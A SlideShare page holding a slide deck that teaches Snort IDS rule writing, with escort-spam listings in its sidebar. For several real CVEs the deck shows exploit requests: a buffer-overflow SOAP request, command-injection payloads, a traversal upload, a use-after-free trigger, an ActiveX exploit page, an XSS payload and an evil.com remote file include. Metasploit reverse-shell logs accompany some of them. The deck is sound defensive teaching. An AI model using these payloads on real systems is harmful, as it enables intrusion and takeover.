Presentation on how to chat with PDF using ChatGPT code interpreterPresentation on how to chat with PDF using ChatGPT code interpreter
Presentation on how to chat with PDF using ChatGPT code interpreternaman860154
 
🐬 The future of MySQL is Postgres 🐘
🐬 The future of MySQL is Postgres 🐘🐬 The future of MySQL is Postgres 🐘
🐬 The future of MySQL is Postgres 🐘RTylerCroy
 
Injustice - Developers Among Us (SciFiDevCon 2024)
Injustice - Developers Among Us (SciFiDevCon 2024)Injustice - Developers Among Us (SciFiDevCon 2024)
Injustice - Developers Among Us (SciFiDevCon 2024)Allon Mureinik
 
Slack Application Development 101 Slides
Slack Application Development 101 SlidesSlack Application Development 101 Slides
Slack Application Development 101 Slidespraypatel2
 
Automating Google Workspace (GWS) & more with Apps Script
Automating Google Workspace (GWS) & more with Apps ScriptAutomating Google Workspace (GWS) & more with Apps Script
Automating Google Workspace (GWS) & more with Apps Scriptwesley chun
 
Neo4j - How KGs are shaping the future of Generative AI at AWS Summit London ...
Neo4j - How KGs are shaping the future of Generative AI at AWS Summit London ...Neo4j - How KGs are shaping the future of Generative AI at AWS Summit London ...
Neo4j - How KGs are shaping the future of Generative AI at AWS Summit London ...Neo4j
 
From Event to Action: Accelerate Your Decision Making with Real-Time Automation
From Event to Action: Accelerate Your Decision Making with Real-Time AutomationFrom Event to Action: Accelerate Your Decision Making with Real-Time Automation
From Event to Action: Accelerate Your Decision Making with Real-Time AutomationSafe Software
 

KĂŒrzlich hochgeladen (20)

08448380779 Call Girls In Greater Kailash - I Women Seeking Men
08448380779 Call Girls In Greater Kailash - I Women Seeking Men08448380779 Call Girls In Greater Kailash - I Women Seeking Men
08448380779 Call Girls In Greater Kailash - I Women Seeking Men
 
EIS-Webinar-Prompt-Knowledge-Eng-2024-04-08.pptx
EIS-Webinar-Prompt-Knowledge-Eng-2024-04-08.pptxEIS-Webinar-Prompt-Knowledge-Eng-2024-04-08.pptx
EIS-Webinar-Prompt-Knowledge-Eng-2024-04-08.pptx
 
08448380779 Call Girls In Friends Colony Women Seeking Men
08448380779 Call Girls In Friends Colony Women Seeking Men08448380779 Call Girls In Friends Colony Women Seeking Men
08448380779 Call Girls In Friends Colony Women Seeking Men
 
IAC 2024 - IA Fast Track to Search Focused AI Solutions
IAC 2024 - IA Fast Track to Search Focused AI SolutionsIAC 2024 - IA Fast Track to Search Focused AI Solutions
IAC 2024 - IA Fast Track to Search Focused AI Solutions
 
08448380779 Call Girls In Civil Lines Women Seeking Men
08448380779 Call Girls In Civil Lines Women Seeking Men08448380779 Call Girls In Civil Lines Women Seeking Men
08448380779 Call Girls In Civil Lines Women Seeking Men
 
Workshop - Best of Both Worlds_ Combine KG and Vector search for enhanced R...
Workshop - Best of Both Worlds_ Combine KG and Vector search for enhanced R...Workshop - Best of Both Worlds_ Combine KG and Vector search for enhanced R...
Workshop - Best of Both Worlds_ Combine KG and Vector search for enhanced R...
 
Apidays Singapore 2024 - Building Digital Trust in a Digital Economy by Veron...
Apidays Singapore 2024 - Building Digital Trust in a Digital Economy by Veron...Apidays Singapore 2024 - Building Digital Trust in a Digital Economy by Veron...
Apidays Singapore 2024 - Building Digital Trust in a Digital Economy by Veron...
 
Kalyanpur ) Call Girls in Lucknow Finest Escorts Service 🍾 8923113531 🎰 Avail...
Kalyanpur ) Call Girls in Lucknow Finest Escorts Service 🍾 8923113531 🎰 Avail...Kalyanpur ) Call Girls in Lucknow Finest Escorts Service 🍾 8923113531 🎰 Avail...
Kalyanpur ) Call Girls in Lucknow Finest Escorts Service 🍾 8923113531 🎰 Avail...
 
TrustArc Webinar - Stay Ahead of US State Data Privacy Law Developments
TrustArc Webinar - Stay Ahead of US State Data Privacy Law DevelopmentsTrustArc Webinar - Stay Ahead of US State Data Privacy Law Developments
TrustArc Webinar - Stay Ahead of US State Data Privacy Law Developments
 
04-2024-HHUG-Sales-and-Marketing-Alignment.pptx
04-2024-HHUG-Sales-and-Marketing-Alignment.pptx04-2024-HHUG-Sales-and-Marketing-Alignment.pptx
04-2024-HHUG-Sales-and-Marketing-Alignment.pptx
 
A Call to Action for Generative AI in 2024
A Call to Action for Generative AI in 2024A Call to Action for Generative AI in 2024
A Call to Action for Generative AI in 2024
 
Strategies for Unlocking Knowledge Management in Microsoft 365 in the Copilot...
Strategies for Unlocking Knowledge Management in Microsoft 365 in the Copilot...Strategies for Unlocking Knowledge Management in Microsoft 365 in the Copilot...
Strategies for Unlocking Knowledge Management in Microsoft 365 in the Copilot...
 
Breaking the Kubernetes Kill Chain: Host Path Mount
Breaking the Kubernetes Kill Chain: Host Path MountBreaking the Kubernetes Kill Chain: Host Path Mount
Breaking the Kubernetes Kill Chain: Host Path Mount
 
Presentation on how to chat with PDF using ChatGPT code interpreter
Presentation on how to chat with PDF using ChatGPT code interpreterPresentation on how to chat with PDF using ChatGPT code interpreter
Presentation on how to chat with PDF using ChatGPT code interpreter
 
🐬 The future of MySQL is Postgres 🐘
🐬 The future of MySQL is Postgres 🐘🐬 The future of MySQL is Postgres 🐘
🐬 The future of MySQL is Postgres 🐘
 
Injustice - Developers Among Us (SciFiDevCon 2024)
Injustice - Developers Among Us (SciFiDevCon 2024)Injustice - Developers Among Us (SciFiDevCon 2024)
Injustice - Developers Among Us (SciFiDevCon 2024)
 
Slack Application Development 101 Slides
Slack Application Development 101 SlidesSlack Application Development 101 Slides
Slack Application Development 101 Slides
 
Automating Google Workspace (GWS) & more with Apps Script
Automating Google Workspace (GWS) & more with Apps ScriptAutomating Google Workspace (GWS) & more with Apps Script
Automating Google Workspace (GWS) & more with Apps Script
 
Neo4j - How KGs are shaping the future of Generative AI at AWS Summit London ...
Neo4j - How KGs are shaping the future of Generative AI at AWS Summit London ...Neo4j - How KGs are shaping the future of Generative AI at AWS Summit London ...
Neo4j - How KGs are shaping the future of Generative AI at AWS Summit London ...
 
From Event to Action: Accelerate Your Decision Making with Real-Time Automation
From Event to Action: Accelerate Your Decision Making with Real-Time AutomationFrom Event to Action: Accelerate Your Decision Making with Real-Time Automation
From Event to Action: Accelerate Your Decision Making with Real-Time Automation
 

Introduction to Snort Rule Writing

  • 2. Snort Rule Syntax # rule header alert tcp any any -> 192.168.1.0/24 111 ( rule action protocol src address src port dst address dst port
  • 3. Snort Rule Syntax # rule option format alert tcp any any -> 192.168.1.0/24 111 ( msg:"Rule Message"; rule option rule option argument
  • 4. rule option: content # content match example alert tcp any any -> 192.168.1.0/24 111 ( content:"ABCD"; # is equivalent to: content:"|41 42 43 44|"; The content match finds a static pattern in network data.
  • 5. content modifiers: nocase # content match modifiers: nocase alert tcp any any -> 192.168.1.0/24 111 ( # match "ABCD" or "abcd" etc. content:"ABCD"; nocase; nocase makes a content match case insensitive. content matches are case sensitive by default.
  • 6. content modifiers: offset # content match modifiers: offset alert tcp any any -> 192.168.1.0/24 111 ( # skip 2 bytes before searching for "ABCD" content:"ABCD"; offset:2; offset requires the match to occur after the designated offset in network data.
  • 7. content modifiers: depth # content match modifiers: depth alert tcp any any -> 192.168.1.0/24 111 ( # match "ABCD" within the first 4 bytes of the payload content:"ABCD"; depth:4; depth restricts how far Snort should search for the specified pattern.
  • 8. content modifiers: distance # content match modifiers: distance alert tcp any any -> 192.168.1.0/24 111 ( # find "DEF" 1 byte after "ABC" content:"ABC"; content:"DEF"; distance:1; distance specifies how far into a payload Snort should ignore before starting to search for the specified pattern relative to the end of the previous pattern match.
  • 9. content modifiers: within # content match modifiers: within alert tcp any any -> 192.168.1.0/24 111 ( # find "EFG" within 10 bytes of "ABC" content:"ABC"; content:"EFG"; within:10; within makes sure that at most N bytes are between pattern matches.
  • 10. negated content match # negated content match alert tcp any any -> 192.168.1.0/24 111 ( # make sure "EFG" is NOT within 10 bytes of "ABC" content:"ABC"; content:!"EFG"; within:10; content matches can be negated.
  • 11. content buffers # content buffer example alert tcp any any -> 192.168.1.0/24 111 ( # match "ABC" within the HTTP URI content:"ABC"; http_uri; content matches can be restricted to a payload location, such as the HTTP URI.
  • 12. content buffers POST /index.php HTTP/1.1 Host: example.com Content-Length: 28 Content-Type: application/x-www-form-urlencoded Cookie: this_is_a_cookie=this_is_its_value firstparam=one&secondparam=two Buffers: http_method http_uri http_header http_cookie http_client_body
  • 13. content modifiers: fast_pattern # fast_pattern example alert tcp any any -> 192.168.1.0/24 111 ( # set "ABC" as the rule fast_pattern content:"ABC"; fast_pattern; fast_pattern explicitly specifies the content match within a rule to be used with the fast pattern matcher. The fast_pattern serves as the “entrance” condition for rule evaluation.
  • 14. content modifiers: fast_pattern # fast_pattern:only; example alert tcp any any -> 192.168.1.0/24 111 ( # set "ABC" as the rule fast_pattern content:"ABC"; fast_pattern:only; fast_pattern:only; selects the content match to be used in the fast pattern matcher for the rule and also specifies that this match will not be evaluated again when the rule “enters”.
  • 15. rule option: pcre # pcre rule option example alert tcp any any -> 192.168.1.0/24 111 ( # match the following regex pcre:"/A[BC]D/i"; pcre declares a Perl compatible regular expression for matching on payload data. Flags can be specified after the slash. e.g. /i for case insensitivity.
  • 16. Traffic Triage and Isolation Normal Trafficfast_pattern content, etc. Vulnerable Application Traffic Slow Fast pcre content, etc. Vulnerable Parameter Traffic Vulnerability Condition Vulnerability Condition Traffic VolumeSpeed Traffic Type
  • 18. Detection Topics > Buffer Overflow Command Injection Directory Traversal Use-After-Free Remote File Include Browser Plugins Cross Site Scripting Malware Command Traffic
  • 19. Buffer Overflow Overview Stack buffer overflow in AVM Fritz!Box daemon dsl_control. AVM Fritz!Box firmware fails to check the length of user supplied data in a 'se' or ScriptExecute command sent in a SOAP request to the dsl_control daemon.
  • 20. Buffer Overflow Overview dsl_cpi_cli_access.c registers the command 'se' to the DSL_CPE_CLI_ScriptExecute handler function: [...] DSL_CPE_CLI_CMD_ADD_COMM ( "se", "ScriptExecute", DSL_CPE_CLI_ScriptExecute, g_sSe); [...]
  • 21. Buffer Overflow Overview DSL_CLI_LOCAL DSL_int_t DSL_CPE_CLI_ScriptExecute([...]) { [...] DSL_char_t sFileName[DSL_MAX_COMMAND_LINE_LENGTH] = {0}; if(DSL_CPE_CLI_CheckParamNumber(pCommands,1, DSL_CLI_EQUALS) == DSL_FALSE) { return -1; } DSL_CPE_sscanf(pCommands, "%s", sFileName); [...]
  • 22. Buffer Overflow Overview The code calls the function DSL_CPE_sscanf in order to copy the value of the parameter pCommands to the local character array sFileName without restricton or bounds checking. The size of the vulnerable stack buffer is 256 bytes as indicated in dsl_cpi_cli_console.h: #define DSL_MAX_COMMAND_LINE_LENGTH 256 Triggering the vulnerability is then a simple matter of sending >256 bytes in the first 'se' parameter.
  • 23. Buffer Overflow Exploit <?xml version="1.0" encoding="UTF-8"?> <SOAP-ENV:Envelope xmlns:SOAP-ENV= "http://schemas.xmlsoap.org/soap/envelope/"; xmlns:ifx="urn:dsl_api"> <SOAP-ENV:Body> <ifx:DslCpeCliAccess> <command>se "A"*300</command> </ifx:DslCpeCliAccess> </SOAP-ENV:Body> </SOAP-ENV:Envelope>
  • 24. Buffer Overflow Detection # vulnerable SOAP request # with at least 256 bytes # within <command></command> # content:"DslCpeCliAccess"; fast_pattern:only; http_client_body; content:"<command"; nocase; http_client_body; isdataat:256,relative; content:!"</command"; nocase; within:256; http_client_body; # stack buffer overflow (>256 bytes) # within param0: <command> se param0 </command> # pcre:"/<command[^>]*?>s*ses[^<]{256}/Pi";
  • 25. Buffer Overflow Detection alert tcp $EXTERNAL_NET any -> $HOME_NET 8080 ( msg:"SERVER-WEBAPP AVM FritzBox dsl_control stack buffer overflow attempt"; flow:to_server,established; content:"DslCpeCliAccess"; fast_pattern:only; http_client_body; content:"<command"; nocase; http_client_body; isdataat:256,relative; content:!"</command"; within:256; nocase; http_client_body; pcre:"/<command[^>]*?>s*ses[^<]{256}/Pi"; metadata:policy security-ips drop, service http; classtype:attempted-admin; )
  • 26. Detection Topics > Buffer Overflow Command Injection Directory Traversal Use-After-Free Remote File Include Browser Plugins Cross Site Scripting Malware Command Traffic
  • 27. Detection Topics Buffer Overflow > Command Injection Directory Traversal Use-After-Free Remote File Include Browser Plugins Cross Site Scripting Malware Command Traffic
  • 28. Command Injection Overview CVE-2014-3805 Command injection vulnerabilities in AlienVault OSSIM av- centerd, which accepts SOAP commands on port 40007. SOAP command 'get_log_line' parameter '$number_lines' and 'get_license' parameter '$license_type' are used in OS commands without sanitization.
  • 29. Command Injection Overview /usr/share/alienvault-center/lib/AV/CC/Util.pm sub get_log_line() { my ( $function_llamada, $name, $uuid, $admin_ip, $hostname, $r_file, $number_lines ) = @_; [...] # $number_lines used in OS command without sanitization my $command = "tail -$number_lines $r_file"; my @content = `$command`; [...] }
  • 30. Command Injection Overview /usr/share/alienvault-center/lib/AV/CC/Util.pm sub get_license() { my ( $function_llamada, $name, $uuid, $admin_ip, $hostname, $license, $license_type ) = @_; [...] # $license_type used in OS command without sanitization my $package = system ("curl --proxy-anyauth -K /etc/curlrc http://[...]/avl/$license_type/[...]"); }
  • 31. Command Injection Exploit POST /av-centerd HTTP/1.1 Host: 172.16.8.223:40007 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1) Content-Length: 765 Content-Type: text/xml; charset=utf-8 SOAPAction: "AV/CC/Util#get_log_line" <?xml version="1.0" encoding="UTF-8"?><soap:Envelope soap:encodingStyle[...]><soap:Body><get_log_line xmlns="AV/CC/Util"><c-gensym3 xsi:type="xsd:string">All[...]</c-gensym3><c-gensym13 xsi:type="xsd:string">&amp;&amp; perl -MMIME::Base64 -e &apos;system(decode_base64(&quot;cGVy[...]</c- gensym13></get_log_line></soap:Body></soap:Envelope>
  • 32. Command Injection Exploit POST /av-centerd HTTP/1.1 Host: 172.16.8.223:40007 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1) Content-Length: 765 Content-Type: text/xml; charset=utf-8 SOAPAction: "AV/CC/Util#get_log_line" <?xml version="1.0" encoding="UTF-8"?><soap:Envelope soap:encodingStyle[...]><soap:Body><get_log_line xmlns="AV/CC/Util"><c-gensym3 xsi:type="xsd:string">All[...]</c-gensym3><c-gensym13 xsi:type="xsd:string">&amp;&amp; perl -MMIME::Base64 -e &apos;system(decode_base64(&quot;cGVy[...]</c- gensym13></get_log_line></soap:Body></soap:Envelope>
  • 33. Command Injection Exploit msf exploit(alienvault_centerd_soap_exec) > exploit [*] Started reverse handler on 172.16.158.1:4444 [*] Command shell session 1 opened (172.16.158.1:4444 -> 172.16.158.173:41320) at 2014-07-19 12:09:00 -0500 id uid=0(root) gid=0(root) groups=0(root) remember traffic isolation...
  • 34. Command Injection Detection alert tcp $EXTERNAL_NET any -> $HOME_NET $HTTP_PORTS ( msg:"SERVER-WEBAPP AlienVault OSSIM get_log_line command injection attempt"; flow:to_server,established; content:"/av-centerd"; nocase; http_uri; content:"<get_log_line"; fast_pattern; nocase; http_client_body; content:"xsd:string"; distance:0; nocase; http_client_body; pcre:"/xsdx3astring[^>]*?>[^<]*?([x3bx7cx26x60]|x24x28)/Pi"; metadata:service http; reference:cve,2014-3805; classtype:attempted-admin; )
  • 35. Command Injection Detection alert tcp $EXTERNAL_NET any -> $HOME_NET $HTTP_PORTS ( msg:"SERVER-WEBAPP AlienVault OSSIM get_license command injection attempt"; flow:to_server,established; content:"/av-centerd"; nocase; http_uri; content:"<get_license"; fast_pattern; nocase; http_client_body; content:"xsd:string"; distance:0; nocase; http_client_body; pcre:"/xsdx3astring[^>]*?>[^<]*?([x3bx7cx26x60]|x24x28)/Pi"; metadata:service http; reference:cve,2014-3805; classtype:attempted-admin; )
  • 36. Command Injection Overview CVE-2014-5073 OS command injection vulnerability in VMTurbo Operations Manager vmtadmin.cgi parameter 'fileDate'. If the 'callType' parameter is set to "DOWN" vmtadmin.cgi will pass the value of 'fileDate' to system().
  • 37. Command Injection Overview my $actiontype = $query->param("actionType"); my $calltype = $query->param("callType"); my $filedate = $query->param("fileDate"); my $statusfile = (defined $filedate) ? $filedate : $mon.".".$mday." [...] [...] elseif ($calltype eq "DOWN") { [...] system("rm "$upload_dir$statusfile""); [...]
  • 38. Command Injection Exploit GET /cgi-bin/vmtadmin.cgi?callType=DOWN&actionType=CFGBACKUP &fileDate=%22%60printf%20%27177105114[...] HTTP/1.1 Host: 172.16.41.140 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1) Content-Type: application/x-www-form-urlencoded Content-Length: 0
  • 39. Command Injection Exploit GET /cgi-bin/vmtadmin.cgi?callType=DOWN&actionType=CFGBACKUP &fileDate=%22%60printf%20%27177105114[...] HTTP/1.1 Host: 172.16.41.140 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1) Content-Type: application/x-www-form-urlencoded Content-Length: 0
  • 40. Command Injection Exploit msf exploit(vmturbo_vmtadmin_exec_noauth) > exploit [*] Started reverse handler on 172.16.158.1:4444 [*] Command shell session 1 opened (172.16.158.1:4444 -> 172.16.158.173:41320) at 2014-07-19 12:09:00 -0500 id uid=0(root) gid=0(root) groups=0(root)
  • 41. Command Injection Detection alert tcp $EXTERNAL_NET any -> $HOME_NET $HTTP_PORTS ( msg:"SERVER-WEBAPP VMTurbo vmtadmin.cgi command injection attempt"; flow:to_server,established; metadata:policy security-ips drop, service http; reference:cve,2014-5073; classtype:attempted-admin; ) content:"callType=DOWN"; nocase; http_uri; content:"fileDate="; nocase; http_uri; pcre:"/[?&]fileDate=[^&]*?([x60x3bx7c]|[x3cx3ex24]x28)/Ui"; Start by isolating traffic. content:"/cgi-bin/vmtadmin.cgi"; fast_pattern:only; http_uri;
  • 42. Command Injection Detection alert tcp $EXTERNAL_NET any -> $HOME_NET $HTTP_PORTS ( msg:"SERVER-WEBAPP VMTurbo vmtadmin.cgi command injection attempt"; flow:to_server,established; content:"/cgi-bin/vmtadmin.cgi"; fast_pattern:only; http_uri; content:"callType=DOWN"; nocase; http_uri; content:"fileDate="; nocase; http_raw_uri; content:"%26"; distance:0; http_raw_uri; pcre:"/[?&]fileDate=[^&]*?%26/Ii"; metadata:policy security-ips drop, service http; reference:cve,2014-5073; classtype:attempted-admin; )
  • 43. Detection Topics Buffer Overflow > Command Injection Directory Traversal Use-After-Free Remote File Include Browser Plugins Cross Site Scripting Malware Command Traffic
  • 44. Detection Topics Buffer Overflow Command Injection > Directory Traversal Use-After-Free Remote File Include Browser Plugins Cross Site Scripting Malware Command Traffic
  • 45. Directory Traversal Overview CVE-2014-2424 Directory traversal vulnerability in Oracle Event processing. FileUploadServlet function processUploadedFile() fails to properly sanitize the filename parameter value. The WMI service can be abused to convert the file upload into remote code execution without user interaction.
  • 46. Directory Traversal Overview private void processUploadedFile(FileItem paramFileItem) { try { // paramFileItem.getName() used to // create file without verification paramFileItem.write(new File(this.uploadLocation, paramFileItem.getName())); } catch (Exception localException) { [...] } }
  • 47. Directory Traversal Exploit POST /wlevs/visualizer/upload HTTP/1.1 Host: 172.16.8.29:9002 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1) Content-Type: multipart/form-data; boundary=_Part_732_2993821416_1334322828 Content-Length: 2658 --_Part_732_2993821416_1334322828 Content-Disposition: form-data; name="uploadfile"; filename="../../../../../../../WINDOWS/system32/wbem/mof/klIvousnq.mof" Content-Type: application/octet-stream Content-Transfer-Encoding: binary #pragma namespace(".rootcimv2") [...]
  • 48. Directory Traversal Exploit POST /wlevs/visualizer/upload HTTP/1.1 Host: 172.16.8.29:9002 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1) Content-Type: multipart/form-data; boundary=_Part_732_2993821416_1334322828 Content-Length: 2658 --_Part_732_2993821416_1334322828 Content-Disposition: form-data; name="uploadfile"; filename="../../../../../../../WINDOWS/system32/wbem/mof/klIvousnq.mof" Content-Type: application/octet-stream Content-Transfer-Encoding: binary #pragma namespace(".rootcimv2") [...]
  • 49. Directory Traversal Exploit msf exploit(oracle_event_processing_upload) > rexploit [*] Reloading module... [*] Started reverse handler on 172.16.158.1:4444 [*] 172.16.158.198:9002 - Generating payload and mof file... [*] 172.16.158.198:9002 - Uploading the exe payload hENIwUPM.exe... [*] 172.16.158.198:9002 - Uploading the MOF file klIvousnq.mof [*] Sending stage (769536 bytes) to 172.16.158.198 [*] Meterpreter session 1 opened (172.16.158.1:4444 -> 172.16.158.198:1052) at 2014-06-29 15:42:37 -0500 [+] Deleted wbem/mof/klIvousnq.mof [!] This exploit may require manual cleanup of 'hENIwUPM.exe' on the target meterpreter > getuid Server username: NT AUTHORITYSYSTEM
  • 50. Directory Traversal Detection # # Multipart POST # content:"/wlevs/visualizer/upload"; fast_pattern:only; http_uri; content:"filename"; nocase; http_client_body; content:"Content-Disposition"; nocase; http_client_body; pcre:"/filenames*=s*[^rn]*?(x2e|%2e){2}([x2fx5c]|%2f|%5c)/Pi"; # # Urlencoded POST # content:"/wlevs/visualizer/upload"; fast_pattern:only; http_uri; content:"filename="; nocase; http_client_body; pcre:"/(^|&)filename=[^&]*?(x2e|%2e){2}([x2fx5c]|%2f|%5c)/Pim";
  • 51. Directory Traversal Detection alert tcp $EXTERNAL_NET any -> $HOME_NET $HTTP_PORTS ( msg:"SERVER-WEBAPP Oracle Event Processing directory traversal attempt"; flow:to_server,established; content:"/wlevs/visualizer/upload"; fast_pattern:only; http_uri; content:"filename"; nocase; http_client_body; content:"Content-Disposition"; nocase; http_client_body; pcre:"/filenames*=s*[^rn]*?(x2e|%2e){2}([x2fx5c]|%2f|%5c)/Pi"; metadata:policy balanced-ips drop, policy security-ips drop, service http; reference:cve,2014-2424; classtype:attempted-admin; )
  • 52. Directory Traversal Detection alert tcp $EXTERNAL_NET any -> $HOME_NET $HTTP_PORTS ( msg:"SERVER-WEBAPP Oracle Event Processing directory traversal attempt"; flow:to_server,established; content:"/wlevs/visualizer/upload"; fast_pattern:only; http_uri; content:"filename="; nocase; http_client_body; pcre:"/(^|&)filename=[^&]*?(x2e|%2e){2}([x2fx5c]|%2f|%5c)/Pim"; metadata:policy balanced-ips drop, policy security-ips drop, service http; reference:cve,2014-2424; classtype:attempted-admin; )
  • 53. Detection Topics Buffer Overflow Command Injection > Directory Traversal Use-After-Free Remote File Include Browser Plugins Cross Site Scripting Malware Command Traffic
  • 54. Detection Topics Buffer Overflow Command Injection Directory Traversal > Use-After-Free Remote File Include Browser Plugins Cross Site Scripting Malware Command Traffic
  • 55. Use-After-Free Overview CVE-2013-3893 This vulnerability is triggered by Javascript that sets an onlosecapture() handler on the parent of two elements. This handler clears the DOM with document.write() when it is called. The Javascript then calls setCapture() on the parent and the child element. This triggers the onlosecapture() handler, freeing a reference with document.write(). After the free, the invalid reference will remain causing a crash (or code execution) in MSHTML!CTreeNode::GetInterface.
  • 56. Use-After-Free Trigger function trigger() { var id_0 = document.createElement("sup"); var id_1 = document.createElement("audio"); document.body.appendChild(id_0); document.body.appendChild(id_1); id_1.applyElement(id_0); id_0.onlosecapture=function(e) { document.write(""); } id_0.setCapture(); id_1.setCapture(); }
  • 57. Use-After-Free Trigger 0:005> r eax=41414141 ebx=6799799c ecx=679b6a14 edx=00000000 esi=00650d90 edi=021fcb34 eip=679b6b61 esp=021fcb0c ebp=021fcb20 iopl=0 nv up ei pl zr na pe nc cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00010246 MSHTML!CTreeNode::GetInterface+0xd8: 679b6b61 8b08 mov ecx,dword ptr [eax] ds:0023:41414141=????????
  • 58. Use-After-Free Detection alert tcp $EXTERNAL_NET $FILE_DATA_PORTS -> $HOME_NET any ( msg:"BROWSER-IE Microsoft Internet Explorer onlosecapture memory corruption attempt"; flow:to_client,established; file_data; content:".applyElement"; nocase; content:".onlosecapture"; nocase; within:500; fast_pattern; content:".setCapture"; nocase; within:500; content:".setCapture"; nocase; within:500; pcre:"/.applyElements*(s*(?P<var>w+)s*).*?(?P=var).onlosecapture.*?(?P=var).setCapture/si"; metadata:service ftp-data, service http, service imap, service pop3; reference:cve,2013-3893; )
  • 59. Use-After-Free Detection alert tcp $EXTERNAL_NET any -> $SMTP_SERVERS 25 ( msg:"BROWSER-IE Microsoft Internet Explorer onlosecapture memory corruption attempt"; flow:to_server,established; file_data; content:".applyElement"; nocase; content:".onlosecapture"; nocase; within:500; fast_pattern; content:".setCapture"; nocase; within:500; content:".setCapture"; nocase; within:500; pcre:"/.applyElements*(s*(?P<var>w+)s*).*?(?P=var).onlosecapture.*?(?P=var).setCapture/si"; metadata:service smtp; reference:cve,2013-3893; )
  • 60. Detection Topics Buffer Overflow Command Injection Directory Traversal > Use-After-Free Remote File Include Browser Plugins Cross Site Scripting Malware Command Traffic
  • 61. Detection Topics Buffer Overflow Command Injection Directory Traversal Use-After-Free > Remote File Include Browser Plugins Cross Site Scripting Malware Command Traffic
  • 62. Remote File Include Overview CVE-2008-5053 Remote file include vulnerability in Joomla Simple RSS Reader allows execution of arbitrary PHP code via the parameter mosConfig_live_site in administrator/components/com_rssreader/admin.rssreader.php: include("$mosConfig_live_site/components/com_rssreader/about.html"); $mosConfig_live_site is obtained from the GET parameter of the same name sent to admin.rssreader.php. Exploit: http://site/joomlapath/administrator/components/com_rssreader /admin.rssreader.php?mosConfig_live_site=http://evil.com/
  • 63. Remote File Include Detection alert tcp $EXTERNAL_NET any -> $HOME_NET $HTTP_PORTS ( msg:"SERVER-WEBAPP Joomla admin.rssreader.php remote file include attempt"; flow:to_server,established; content:"admin.rssreader.php"; fast_pattern:only; http_uri; content:"mosConfig_live_site="; nocase; http_uri; pcre:"/[?&]mosConfig_live_site=[^&]*?(http|ftp)/Ui"; metadata:service http; reference:cve,2008-5053; classtype:web-application-attack; )
  • 64. Detection Topics Buffer Overflow Command Injection Directory Traversal Use-After-Free > Remote File Include Browser Plugins Cross Site Scripting Malware Command Traffic
  • 65. Detection Topics Buffer Overflow Command Injection Directory Traversal Use-After-Free Remote File Include > Browser Plugins Cross Site Scripting Malware Command Traffic
  • 66. Browser Plugin Overview CVE-2012-2516 GE Proficy Historian's KeyHelp.ocx ActiveX control adds HTML Help functionality for the Proficy enterprise data collection system. It can be instantiated in a web page using the <object> tag, for example: <object id="ctrl" classid="clsid:45e66957-2932-432a-a156-31503df0a681"> Or using Javascript: obj = new ActiveXObject("KeyHelp.KeyScript")
  • 67. Browser Plugin Overview The API of this ActiveX object exposes several methods including LaunchTriPane(), which has the following prototype: Void LaunchTriPane(System.string ChmFile) The function LaunchTriPane will use ShellExecute to launch hh.exe, with user controlled data as parameters: > HH.EXE -decompile D:/destination-folder C:/test.chm This can be abused to write arbitrary files. Code execution is possible by uploading a WMI .mof file.
  • 68. Browser Plugin Disassembly KeyHelp.ocx: 5D335165 CALL KeyHelp.5D31797F 5D33516A JMP SHORT KeyHelp.5D33517D 5D33516C PUSH 5 5D33516E PUSH EDI 5D33516F PUSH ESI ; Malicious command line parameters - no validation 5D335170 PUSH KeyHelp.5D347950 ; ASCII "hh.exe" 5D335175 PUSH EDI 5D335176 PUSH EDI 5D335177 CALL SHELL32.ShellExecuteA ; run hh.exe with malicious params 5D33517D CMP ESI,EDI 5D33517F JE SHORT KeyHelp.5D335187 5D335181 PUSH ESI
  • 69. Browser Plugin Exploit <html> <body><script> KeyScript = new ActiveXObject("KeyHelp.KeyScript"); ChmPayloadFile = "-decompile C:WINDOWSsystem32 "+ "172.16.211.11A5vTb1QLAqfifDoixwWS.chm"; ChmMofFile = "-decompile c:WINDOWSsystem32wbemmof "+ "172.16.211.11A5vTb1QLAqfifQLQklKr.chm"; KeyScript.LaunchTriPane(ChmPayloadFile); setTimeout('KeyScript.LaunchTriPane(ChmMofFile);',3000); </script></body> </html>
  • 70. Browser Plugin Detection # # <OBJECT> Detection # alert tcp $EXTERNAL_NET $HTTP_PORTS -> $HOME_NET any ( msg:"BROWSER-PLUGINS GE Proficy Historian KeyHelp ActiveX clsid access attempt"; flow:to_client,established; file_data; content:"45E66957-2932-432A-A156-31503DF0A681"; fast_pattern:only; content:"LaunchTriPane"; nocase; metadata:policy security-ips drop, service http; reference:cve,2012-2516; classtype:attempted-user; )
  • 71. Browser Plugin Detection # # Javascript Detection # alert tcp $EXTERNAL_NET $HTTP_PORTS -> $HOME_NET any ( msg:"BROWSER-PLUGINS GE Proficy Historian KeyHelp ActiveX clsid access attempt"; flow:to_client,established; file_data; content:"KeyHelp.KeyScript"; fast_pattern:only; content:"LaunchTriPane"; nocase; metadata:policy security-ips drop, service http; reference:cve,2012-2516; classtype:attempted-user; )
  • 72. Detection Topics Buffer Overflow Command Injection Directory Traversal Use-After-Free Remote File Include > Browser Plugins Cross Site Scripting Malware Command Traffic
  • 73. Detection Topics Buffer Overflow Command Injection Directory Traversal Use-After-Free Remote File Include Browser Plugins > Cross Site Scripting Malware Command Traffic
  • 74. Cross Site Scripting (XSS) Overview OSVDB-89893 Cross-Site Scripting vulnerability in Nagios XI's Alert Cloud due to insufficient sanitization of ‘width’ and ‘height’ parameters sent to the URI: /includes/components/alertcloud/index.php Exploit: /nagiosxi/includes/components/alertcloud/index.php?height=4"}}; alert('XSS'); var aa={"A":{"B":"
  • 75. Cross Site Scripting (XSS) Detection alert tcp $EXTERNAL_NET any -> $HOME_NET $HTTP_PORTS ( msg:"SERVER-WEBAPP Nagios XI alert cloud cross site scripting attempt"; flow:to_server,established; content:"/includes/components/alertcloud/index.php"; fast_pattern:only; http_uri; pcre:"/[?&](height|width)=[^&]*?([x22x27x3cx3ex28x29]|script|onload|src)/Ui"; metadata:service http; reference:url,osvdb.org/show/osvdb/89893; classtype:web-application-attack; )
  • 76. Detection Topics Buffer Overflow Command Injection Directory Traversal Use-After-Free Remote File Include Browser Plugins > Cross Site Scripting Malware Command Traffic
